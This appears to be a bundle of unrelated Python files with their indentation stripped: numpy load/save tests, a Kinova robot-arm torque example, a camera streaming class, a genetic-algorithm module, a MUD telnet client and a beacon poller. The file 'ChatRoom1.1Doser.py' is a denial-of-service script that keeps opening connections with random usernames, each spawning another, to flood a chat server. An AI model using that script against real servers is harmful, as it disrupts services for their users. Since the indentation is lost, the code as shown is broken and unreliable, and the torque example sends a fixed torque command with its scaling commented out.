expected = np.array([21, 35], dtype=np.int32)
test = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_array_equal(expected, test)
assert_equal(expected.dtype, test.dtype)
def test_squeeze_scalar(self):
# Regression test for gh-4341
# Unpacking a scalar should give zero-dim output,
# even if dtype is structured
txt = TextIO("1")
dt = {'names': ('a',), 'formats': ('i4',)}
expected = np.array((1,), dtype=np.int32)
test = np.genfromtxt(txt, dtype=dt, unpack=True)
assert_array_equal(expected, test)
assert_equal((), test.shape)
assert_equal(expected.dtype, test.dtype)
class TestPathUsage:
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
if IS_PYPY:
break_cycles()
break_cycles()
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
if IS_PYPY:
break_cycles()
break_cycles()
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter:
def __init__(self, base):
self.base = base
def write(self, s):
return self.base.write(s)
def flush(self):
return self.base.flush()
class JustReader:
def __init__(self, base):
self.base = base
def read(self, n):
return self.base.read(n)
def seek(self, off, whence=0):
return self.base.seek(off, whence)
def test_ducktyping():
a = np.random.random((5, 5))
s = BytesIO()
f = JustWriter(s)
np.save(f, a)
f.flush()
s.seek(0)
f = JustReader(s)
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
torque_control.py
|
#! /usr/bin/env python3
###
# KINOVA (R) KORTEX (TM)
#
# Copyright (c) 2019 Kinova inc. All rights reserved.
#
# This software may be modified and distributed
# under the terms of the BSD 3-Clause license.
#
# Refer to the LICENSE file for details.
#
###
###
# * DESCRIPTION OF CURRENT EXAMPLE:
# ===============================
# This example works as a simili-haptic demo.
#
# The last actuator, the small one holding the interconnect, acts as a torque sensing device commanding the first actuator.
# The first actuator, the big one on the base, is controlled in torque and its position is sent as a command to the last one.
#
# The script can be launched through command line with python3: python torqueControl_example.py
# The PC should be connected through ethernet with the arm. Default IP address 192.168.1.12 is used as arm address.
#
# 1- Connection with the base:
# 1- A TCP session is started on port 10000 for most API calls. Refresh is at 25ms on this port.
# 2- A UDP session is started on port 10001 for BaseCyclic calls. Refresh is at 1ms on this port only.
# 2- Initialization
# 1- First frame is built based on arm feedback to ensure continuity
# 2- First actuator torque command is set as well
# 3- Base is set in low-level servoing
# 4- First frame is sent
# 3- First actuator is switched to torque mode
# 3- Cyclic thread is running at 1ms
# 1- Torque command to first actuator is set to a multiple of last actuator torque measure minus its initial value to
# avoid an initial offset error
# 2- Position command to last actuator equals first actuator position minus initial delta
#
# 4- On keyboard interrupt, example stops
# 1- Cyclic thread is stopped
# 2- First actuator is set back to position control
# 3- Base is set in single level servoing (default)
###
import sys
import os
from kortex_api.autogen.client_stubs.ActuatorConfigClientRpc import ActuatorConfigClient
from kortex_api.autogen.client_stubs.ActuatorCyclicClientRpc import ActuatorCyclicClient
from kortex_api.autogen.client_stubs.BaseClientRpc import BaseClient
from kortex_api.autogen.client_stubs.BaseCyclicClientRpc import BaseCyclicClient
from kortex_api.autogen.client_stubs.DeviceConfigClientRpc import DeviceConfigClient
from kortex_api.autogen.client_stubs.DeviceManagerClientRpc import DeviceManagerClient
from kortex_api.autogen.messages import Session_pb2, ActuatorConfig_pb2, Base_pb2, BaseCyclic_pb2, Common_pb2
from kortex_api.RouterClient import RouterClientSendOptions
import time
import sys
import threading
class TorqueExample:
def __init__(self, router, router_real_time):
self.expected_number_of_actuators = 7 # example works for 7dof Gen3
# self.torque_amplification = 2.0 # Torque measure on 7th actuator is sent as a command to first actuator
self.torque_amplification = 20.0 # Torque measure on 7th actuator is sent as a command to first actuator
# Create required services
device_manager = DeviceManagerClient(router)
self.actuator_config = ActuatorConfigClient(router)
self.base = BaseClient(router)
self.base_cyclic = BaseCyclicClient(router_real_time)
self.base_command = BaseCyclic_pb2.Command()
self.base_feedback = BaseCyclic_pb2.Feedback()
self.base_custom_data = BaseCyclic_pb2.CustomData()
# Detect all devices
device_handles = device_manager.ReadAllDevices()
self.actuator_count = 0
# Only actuators are relevant for this example
for handle in device_handles.device_handle:
if handle.device_type == Common_pb2.BIG_ACTUATOR or handle.device_type == Common_pb2.SMALL_ACTUATOR:
self.base_command.actuators.add()
self.base_feedback.actuators.add()
self.actuator_count += 1
# Change send option to reduce max timeout at 3ms
self.sendOption = RouterClientSendOptions()
self.sendOption.andForget = False
self.sendOption.delay_ms = 0
self.sendOption.timeout_ms = 3
self.cyclic_t_end = 30 #Total duration of the thread in seconds. 0 means infinite.
self.cyclic_thread = {}
self.kill_the_thread = False
self.already_stopped = False
self.cyclic_running = False
def MoveToHomePosition(self):
# Make sure the arm is in Single Level Servoing mode
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Move arm to ready position
print("Moving the arm to a safe position")
action_type = Base_pb2.RequestedActionType()
action_type.action_type = Base_pb2.REACH_JOINT_ANGLES
action_list = self.base.ReadAllActions(action_type)
action_handle = None
for action in action_list.action_list:
if action.name == "Home":
action_handle = action.handle
if action_handle == None:
print("Can't reach safe position. Exiting")
return False
self.base.ExecuteActionFromReference(action_handle)
time.sleep(20) # Leave time to action to complete
return True
def InitCyclic(self, sampling_time_cyclic, t_end, print_stats):
if self.cyclic_running:
return True
# Move to Home position first
if not self.MoveToHomePosition():
return False
print("Init Cyclic")
sys.stdout.flush()
base_feedback = self.SendCallWithRetry(self.base_cyclic.RefreshFeedback, 3)
if base_feedback:
self.base_feedback = base_feedback
if len(self.base_feedback.actuators) == self.expected_number_of_actuators:
# Init command frame
for x in range(self.actuator_count):
self.base_command.actuators[x].flags = 1 # servoing
self.base_command.actuators[x].position = self.base_feedback.actuators[x].position
# First actuator is going to be controlled in torque
# To ensure continuity, torque command is set to measure
self.base_command.actuators[0].torque_joint = self.base_feedback.actuators[0].torque
# Set arm in LOW_LEVEL_SERVOING
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.LOW_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Send first frame
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
# Set first actuator in torque mode now that the command is equal to measure
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('TORQUE')
device_id = 1 # first actuator as id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
# Init cyclic thread
self.cyclic_t_end = t_end
self.cyclic_thread = threading.Thread(target=self.RunCyclic, args=(sampling_time_cyclic, print_stats))
self.cyclic_thread.daemon = True
self.cyclic_thread.start()
return True
else:
print("InitCyclic: number of actuators in base_feedback does not match expected number")
return False
else:
print("InitCyclic: failed to communicate")
return False
def RunCyclic(self, t_sample, print_stats):
self.cyclic_running = True
print("Run Cyclic")
sys.stdout.flush()
cyclic_count = 0 # Counts refresh
stats_count = 0 # Counts stats prints
failed_cyclic_count = 0 # Count communication timeouts
# Initial delta between first and last actuator
init_delta_position = self.base_feedback.actuators[0].position - self.base_feedback.actuators[6].position
# Initial first and last actuator torques; avoids unexpected movement due to torque offsets
init_last_torque = self.base_feedback.actuators[6].torque
init_first_torque = -self.base_feedback.actuators[0].torque # Torque measure is reversed compared to actuator direction
t_now = time.time()
t_cyclic = t_now # cyclic time
t_stats = t_now # print time
t_init = t_now # init time
print("Running torque control example for {} seconds".format(self.cyclic_t_end))
while not self.kill_the_thread:
t_now = time.time()
# Cyclic Refresh
if (t_now - t_cyclic) >= t_sample:
t_cyclic = t_now
# Position command to first actuator is set to measured one to avoid following error to trigger
# Bonus: When doing this instead of disabling the following error, if communication is lost and first
# actuator continue to move under torque command, resulting position error with command will
# trigger a following error and switch back the actuator in position command to hold its position
self.base_command.actuators[0].position = self.base_feedback.actuators[0].position
# First actuator torque command is set to last actuator torque measure times an amplification
# self.base_command.actuators[0].torque_joint = init_first_torque + \
# self.torque_amplification * (self.base_feedback.actuators[6].torque - init_last_torque)
self.base_command.actuators[0].torque_joint = 5.0
print(self.base_command.actuators[0].torque_joint)
# First actuator position is sent as a command to last actuator
self.base_command.actuators[6].position = self.base_feedback.actuators[0].position - init_delta_position
# Incrementing identifier ensure actuators can reject out of time frames
self.base_command.frame_id += 1
if self.base_command.frame_id > 65535:
self.base_command.frame_id = 0
for i in range(self.expected_number_of_actuators):
self.base_command.actuators[i].command_id = self.base_command.frame_id
# Frame is sent
try:
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
except:
failed_cyclic_count = failed_cyclic_count + 1
print("failed")
cyclic_count = cyclic_count + 1
# Stats Print
if print_stats and ((t_now - t_stats) > 1):
t_stats = t_now
stats_count = stats_count + 1
cyclic_count = 0
failed_cyclic_count = 0
sys.stdout.flush()
if self.cyclic_t_end != 0 and (t_now - t_init > self.cyclic_t_end):
print("Cyclic Finished")
sys.stdout.flush()
break
self.cyclic_running = False
return True
def StopCyclic(self):
print ("Stopping the cyclic and putting the arm back in position mode...")
if self.already_stopped:
return
# Kill the thread first
if self.cyclic_running:
self.kill_the_thread = True
self.cyclic_thread.join()
# Set first actuator back in position mode
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('POSITION')
device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
self.cyclic_t_end = 0.1
self.already_stopped = True
print('Clean Exit')
@staticmethod
def SendCallWithRetry(call, retry, *args):
i = 0
arg_out = []
while i < retry:
try:
arg_out = call(*args)
break
except:
i = i + 1
continue
if i == retry:
print("Failed to communicate")
return arg_out
def main():
# Import the utilities helper module
import argparse
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import utilities
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--cyclic_time", type=float, help="delay, in seconds, between cylic control call", default=0.001)
parser.add_argument("--duration", type=int, help="example duration, in seconds (0 means infinite)", default=30)
parser.add_argument("--print_stats", default=True, help="print stats in command line or not (0 to disable)", type=lambda x: (str(x).lower() not in ['false', '0', 'no']))
args = utilities.parseConnectionArguments(parser)
# Create connection to the device and get the router
with utilities.DeviceConnection.createTcpConnection(args) as router:
with utilities.DeviceConnection.createUdpConnection(args) as router_real_time:
example = TorqueExample(router, router_real_time)
success = example.InitCyclic(args.cyclic_time, args.duration, args.print_stats)
if success:
while example.cyclic_running:
try:
time.sleep(0.5)
except KeyboardInterrupt:
break
example.StopCyclic()
if __name__ == "__main__":
main()
|
camera.py
|
""" This module contains camera class """
import os
import cv2 as cv
from sshtunnel import open_tunnel
from contextlib import contextmanager
from datetime import datetime
from threading import Thread
from queue import Queue
from time import time
from idp206.calibration import Calibration
CAMERA_DEFAULT_PATH_TEMPLATE = 'http://%s:%d/stream/video.mjpeg'
CAMERA_INFO = {
'idpcam1': ('idpcam1.eng.cam.ac.uk', 8080),
'idpcam2': ('idpcam2.eng.cam.ac.uk', 8080)
}
REMOTE_SERVER_ADDRESS = ('gate.eng.cam.ac.uk', 22)
LOCAL_BIND_ADDRESS = 'localhost'
DEFAULT_CALIBRATION_IMAGES_PATH = 'calib/images'
SSH_USERNAME=''
SSH_PASSWORD=''
class Camera:
""" Main camera class """
def __init__(self, name, address, port, local_port=8080, calibration=None):
self.name = name
self.address = address
self.port = port
self.local_port = local_port
if calibration and not isinstance(calibration, Calibration):
raise ValueError(
f'Calibration need to be instance of {type(Calibration)} but is {type(calibration)}')
self.calibration = calibration
@contextmanager
def _open_camera(self):
capture = cv.VideoCapture(CAMERA_DEFAULT_PATH_TEMPLATE % (self.address, self.port))
try:
yield capture
finally:
capture.release()
@contextmanager
def _open_camera_ssh_tunnel(self):
with open_tunnel(
REMOTE_SERVER_ADDRESS,
ssh_username=SSH_USERNAME,
ssh_password=SSH_PASSWORD,
remote_bind_address=(self.address, self.port),
local_bind_address=(LOCAL_BIND_ADDRESS, self.local_port)
) as _:
capture = cv.VideoCapture(CAMERA_DEFAULT_PATH_TEMPLATE % (LOCAL_BIND_ADDRESS, self.local_port))
try:
yield capture
finally:
capture.release()
def open(self, ssh_tunnel=False):
""" Establish connection to the camera """
if ssh_tunnel:
return self._open_camera_ssh_tunnel()
return self._open_camera()
def _get_default_dirpath(self):
dirname_template = f'{self.name} (%d-%m-%Y %H.%M.%S)'
dirpath = DEFAULT_CALIBRATION_IMAGES_PATH + '/' + datetime.now().strftime(dirname_template)
os.mkdir(dirpath)
return dirpath
def _frame_paths(self, dirpath='', prefix='calib_', image_format='jpg', index=0):
if not dirpath:
dirpath = self._get_default_dirpath()
while(True):
path = f'{dirpath}/{prefix}{index}.{image_format}'
yield path
index += 1
def _get_downloader(self, queue, interval=0.5, *args, **kwargs):
def downloader():
for path in self._frame_paths(*args, **kwargs):
start = time()
while(True):
frame = queue.get()
if (time() - start) > interval:
success = cv.imwrite(path, frame)
if not success:
raise RuntimeError("Can't save images")
break
queue.task_done()
return downloader
def download_frames(self, *args, ssh_tunnel=False, **kwargs):
""" Download frames that could be used for camera calibration. """
queue = Queue()
Thread(target=self._get_downloader(queue, *args, **kwargs), daemon=True).start()
self.show(output=queue, ssh_tunnel=ssh_tunnel, show_info=False)
queue.join()
def show(self, output=None, ssh_tunnel=False, show_info=True):
""" Stream the camera ouput """
with self.open(ssh_tunnel=ssh_tunnel) as cap:
try:
start = None
while cap.isOpened():
_, frame = cap.read()
if show_info:
end = time()
if start:
fps = 1 / (end - start)
frame = cv.putText(
frame,
f'FPS: {fps:.2f}',
(0, 64),
cv.FONT_HERSHEY_SIMPLEX,
1,
(0, 0, 255),
1,
cv.LINE_AA
)
start = end
cv.imshow(f'{self.name}', frame)
cv.waitKey(2)
if output:
output.put(frame)
except KeyboardInterrupt:
# print("Cancelling...")
cv.destroyAllWindows()
|
Generation.py
|
from multiprocessing import Process, Array
from BreedingPool import *
class Generation():
"""
A group of chromosomes
"""
def __init__(self, generationType, population):
self.generationType = generationType
self.population = population
def copy(self):
"""
Return a deep copy of this generation
:rtype: Generation
"""
newPopulation = []
for chromosome in self.population:
newPopulation.append(chromosome.copy())
return Generation(self.generationType, newPopulation)
def getNextGeneration(self, size, elitism, randIndividuals, randFitness, mutationRate, mutationSTDEV):
"""
Return a new generation of individuals. To get multithreading, call doFitnessTests before this function
:param size: the size of the new generation
:type size: int
:param elitism: preserve the n most fit individuals without mutations or crossovers
:type elitism: int
:param randIndividuals: add n random chromosomes to the breeding population
:type randIndividuals: int
:param randFitness: random individuals may have very low fitness. If not None, the maximum of this value and
the actual random fitness is used
:type randFitness: float
:param mutationRate: the average number of mutations each gene will undergo
:type mutationRate: float
:param mutationSTDEV: the standard deviation for the number of mutations each gene will undergo
:type mutationSTDEV: float
:rtype: Generation
"""
newPopulation = []
breedingPopulation = []
#preserve some elite individuals
newPopulation += self.getNMostFit(elitism)
#add all individuals with fitness greater than 0 to the breeding population
for chromosome in self.population:
if chromosome.getFitness() > 0:
breedingPopulation.append(chromosome)
#add some randomized individuals to the breeding population
for r in xrange(randIndividuals):
rando = self.generationType.chromosomeType.getRandomChromosome()
rando.doFitnessTest()
if randFitness is not None:
rando.fitness = max(rando.fitness, randFitness)
breedingPopulation.append(rando)
#breed a new generation of chromosomes
breedingPool = BreedingPool(breedingPopulation)
while len(newPopulation) < size:
newChromosome = breedingPool.get() + breedingPool.get()
newChromosome.mutate(mutationRate, mutationSTDEV)
newPopulation.append(newChromosome)
return Generation(self.generationType, newPopulation)
def doFitnessTests(self, threads=1):
"""
Measure the fitness of each chromosome (if the chromosome has not been previously measured)
:param threads: the number of theads to use on this operation
"""
if threads <= 1:
for chromosome in self.population:
chromosome.doFitnessTest()
else:
fitness_calculation_result = Array('d', len(self.population))
def testFunct(chromosomes, start, end):
print end - start
index = start;
while index < end:
chromosomes[index].doFitnessTest()
fitness_calculation_result[index] = chromosomes[index].fitness
index += 1
# --- Commented by MR. I do not understand why we do this work twice:
# --- 1 in common, second in treads (in testFunct)
#for chromosome in self.population:
# chromosome.doFitnessTest()
procs = []
begin = 0
chunksize = int(math.floor(len(self.population) / threads))
for t in xrange(threads):
p = None
if t+1 == threads: #if it is the last thread then give it all remaining
p = Process(target=testFunct, args=(self.population,begin,len(self.population)))
else:
p = Process(target=testFunct, args=(self.population,begin,begin+chunksize))
p.start()
begin += chunksize
procs.append(p)
for p in procs:
p.join()
# Added by MR Using shared array to get caclulated data in main thread
for i in xrange(len(self.population)):
self.population[i].fitness = fitness_calculation_result[i]
def getMostFit(self):
"""
Return the most fit individual in a generation. Returns None if no individual is more than "0 fit"
:rtype: Chromosome
"""
mostFit = -1
rVal = None
for chromosome in self.population:
fitness = chromosome.getFitness
if fitness > 0 and fitness > mostFit:
mostFit = fitness
rVal = chromosome
return rVal
def getNMostFit(self, N):
"""
Return the N members of this generation that have the highest fitness
:rtype: [Chromosome]
"""
if N == 0:
return []
self.population = sorted(self.population)
return self.population[-1 * N:]
def data(self):
"""
Return an object that can be used to convert a generation to yaml
"""
data = {}
for index, chromosome in enumerate(self.population):
data[index] = chromosome.data()
return data
|
ChatRoom1.1Doser.py
|
#!/usr/bin/env python
# -.- coding: utf-8 -.-y
import random
import socket
import os
import time
import threading
import Queue
import sys
import argparse
from multiprocessing import Process
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Client════════╝
═════════════════════════════════════════════════════════
\33[92m"""
quit = Queue.Queue()
tick = Queue.Queue()
path = os.path.realpath(__file__)
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--screen", help="This is used by the script to make a screen. Not necessarily needed for regular users.")
args = parser.parse_args()
cv = "1.1"
username = raw_input("Name:")
server = raw_input("Server IP[127.0.0.1]:")
port = raw_input("Server Port[22550]:")
if port == "":
port = "22550"
else:
pass
if server == "":
server = "127.0.0.1"
else:
pass
print port
class connect(object):
def __init__(self, server, port, username, quit, tick):
self.tick = tick
self.quit = quit
self.server = server
self.port = port
self.username = username
self.con()
def con(self):
#try:
global cv
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_address = (self.server, int(self.port))
self.sock.connect(server_address)
except:
print "Error...\nUnable to connect to " + self.server
os._exit(0)
self.sock.settimeout(60)
self.sock.send("cv:" + cv)
compatible = self.sock.recv(1024)
if compatible == "comp:1":
pass
else:
print """\33[91m
***************************************************
Error Server is on version """ + compatible[7:] + """
***************************************************
"""
sys.exit()
os._exit(0)
self.sock.send("user:" + str(random.randint(0, 9999999)))
nc = self.sock.recv(1024)
if "error:" in nc:
print """\33[91m
***************************************************
Error while sending username:
""" + nc[6:] + """
***************************************************
"""
os._exit(0)
#threading.Thread(target = self.ping, args=()).start()
threading.Thread(target = self.con, args=()).start()
#self.screen.start()
quit = False
while True:
#inp = raw_input(">>")
#time.sleep(.2)
#send = str(random.randint(0, 9))
#self.sock.send(send)
#print send
time.sleep(1)
else:
os._exit(0)
def quitcheck(quit):
while True:
time.sleep(1)
if quit.empty() == True:
pass
else:
os._exit(0)
threading.Thread(target = quitcheck, args=(quit,)).start()
threading.Thread(target=connect, args=(server, port, username, quit, tick)).start()
|
pycat.py
|
#!/usr/bin/env python3
from proxy import proxy
from select import select
import importlib
import json
import os
import pprint
import re
import sys
import telnetlib
import threading
import traceback
telnetlib.GMCP = b'\xc9'
class Session(object):
def __init__(self, world_module, port, arg):
self.mud_encoding = 'iso-8859-1'
self.client_encoding = 'utf-8'
self.gmcp = {}
self.world_module = world_module
self.arg = arg
self.world = world_module.getClass()(self, self.arg)
try:
self.socketToPipeR, self.pipeToSocketW, self.stopFlag, runProxy = proxy('::1', port)
self.pipeToSocketW = os.fdopen(self.pipeToSocketW, 'wb')
self.proxyThread = threading.Thread(target=runProxy)
self.proxyThread.start()
host_port = self.world.getHostPort()
self.log("Connecting")
self.telnet = self.connect(*host_port)
self.log("Connected")
except:
self.log("Shutting down")
self.stopFlag.set()
self.world.quit()
raise
def join(self):
self.thr.join()
def log(self, *args, **kwargs):
if len(args) == 1 and type(args[0]) == str:
line = args[0]
else:
line = pprint.pformat(args)
self.pipeToSocketW.write("---------\n".encode(self.client_encoding))
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.write(b"\n")
self.pipeToSocketW.flush()
def strip_ansi(self, line):
return re.sub(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]', '', line)
def gmcpOut(self, msg):
self.telnet.sock.sendall(telnetlib.IAC + telnetlib.SB + telnetlib.GMCP + msg.encode(self.mud_encoding) + telnetlib.IAC + telnetlib.SE)
def iac(self, sock, cmd, option):
if cmd == telnetlib.WILL:
if option == telnetlib.GMCP:
self.log("Enabling GMCP")
sock.sendall(telnetlib.IAC + telnetlib.DO + option)
self.gmcpOut('Core.Hello { "client": "Cizra", "version": "1" }')
supportables = ['char 1', 'char.base 1', 'char.maxstats 1', 'char.status 1', 'char.statusvars 1', 'char.vitals 1', 'char.worth 1', 'comm 1', 'comm.tick 1', 'group 1', 'room 1', 'room.info 1']
self.gmcpOut('Core.Supports.Set ' + str(supportables).replace("'", '"'))
self.gmcpOut('request room')
self.gmcpOut('request char')
elif option == telnetlib.TTYPE:
self.log("Sending terminal type 'Cizra'")
sock.sendall(telnetlib.IAC + telnetlib.DO + option +
telnetlib.IAC + telnetlib.SB + telnetlib.TTYPE + telnetlib.BINARY + b'Cizra' + telnetlib.IAC + telnetlib.SE)
else:
sock.sendall(telnetlib.IAC + telnetlib.DONT + option)
elif cmd == telnetlib.SE:
data = self.telnet.read_sb_data()
if data and data[0] == ord(telnetlib.GMCP):
try:
self.handleGmcp(data[1:].decode(self.mud_encoding))
except Exception as e:
traceback.print_exc()
def handleGmcp(self, data):
# this.that {JSON blob}
# TODO: move into clients
space_idx = data.find(' ')
whole_key = data[:space_idx]
value_json = data[space_idx + 1:]
nesting = whole_key.split('.')
current = self.world.gmcp
for nest in nesting[:-1]:
if nest not in current:
current[nest] = {}
current = current[nest]
lastkey = nesting[-1]
try:
val = json.loads(value_json)
except json.decoder.JSONDecodeError:
val = {"string": value_json}
if lastkey not in current:
current[lastkey] = {}
current[lastkey] = val
self.world.handleGmcp(whole_key, val)
def connect(self, host, port):
t = telnetlib.Telnet()
t.set_option_negotiation_callback(self.iac)
# t.set_debuglevel(1)
t.open(host, int(port))
return t
def send(self, line):
print("> ", line)
self.telnet.write((line + '\n').encode(self.mud_encoding))
def handle_from_telnet(self):
try:
data = self.telnet.read_very_eager()
except:
self.log("EOF on telnet")
self.stopFlag.set()
self.world.quit()
raise
try:
data = data.decode(self.mud_encoding)
except UnicodeError as e:
print("Unicode error:", e)
print("Data was:", data)
data = ''
if not data:
_ = self.telnet.read_sb_data()
prn = []
for line in data.split('\n'):
if line:
replacement = None
try:
replacement = self.world.trigger(line.strip())
except Exception as e:
traceback.print_exc()
if replacement is not None:
line = replacement
prn.append(line)
self.pipeToSocketW.write('\n'.join(prn).encode(self.mud_encoding))
self.pipeToSocketW.flush()
def show(self, line):
self.pipeToSocketW.write(line.encode(self.client_encoding))
self.pipeToSocketW.flush()
def handle_from_pipe(self):
data = b'' # to handle partial lines
try:
data += os.read(self.socketToPipeR, 4096)
lines = data.split(b'\n')
if lines[-1] != '': # received partial line, don't process
data = lines[-1]
else:
data = b''
lines = lines[:-1] # chop off either the last empty line, or the partial line
for line in lines:
line = line.decode(self.client_encoding)
if line[-1] == '\r':
line = line[:-1]
self.handle_output_line(line)
except EOFError:
self.log("EOF in pipe")
self.stopFlag.set()
self.world.quit()
raise
def handle_output_line(self, data):
pprint.pprint(data)
if data == '#reload' and self.world:
self.log('Reloading world')
try:
state = self.world.state
gmcp = self.world.gmcp
self.world.quit()
self.world_module = importlib.reload(self.world_module)
self.world = self.world_module.getClass()(self, self.arg)
self.world.state = state
self.world.gmcp = gmcp
except Exception:
traceback.print_exc()
return
else:
handled = False
try:
handled = self.world.alias(data)
except Exception as e:
traceback.print_exc()
else:
if not handled:
self.send(data)
def run(self):
try:
while True:
fds, _, _ = select([self.telnet.get_socket(), self.socketToPipeR], [], [])
for fd in fds:
if fd == self.telnet.get_socket():
self.handle_from_telnet()
elif fd == self.socketToPipeR:
self.handle_from_pipe()
except Exception as e:
self.log("Exception in run():", e)
finally:
self.log("Closing")
self.telnet.close()
def main():
if len(sys.argv) < 3 or len(sys.argv) > 4:
print("Usage: {} worldmodule (without .py) port [arg]".format(sys.argv[0]))
exit(1)
world_module = importlib.import_module(sys.argv[1])
port = int(sys.argv[2])
arg = sys.argv[3] if len(sys.argv) == 4 else None
ses = Session(world_module, port, arg)
ses.run()
assert(__name__ == '__main__')
main()
|
datapoller.py
|
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import api
import json
class DataPoller(object):
"""Class for polling for data from the BLiP controller
Beacon Filters and Tasking will be received and stored
locally and used to process each packet seen.
"""
def __init__(
self, interval=5, beacon_filters=None,
task_queue=None, logger=print):
""" Constructor
:type interval: int
:param interval: Check interval (seconds)
:type beacon_filters: dict
:param beacon_filters: Dictionary of {beacon filter -> beacon handler}
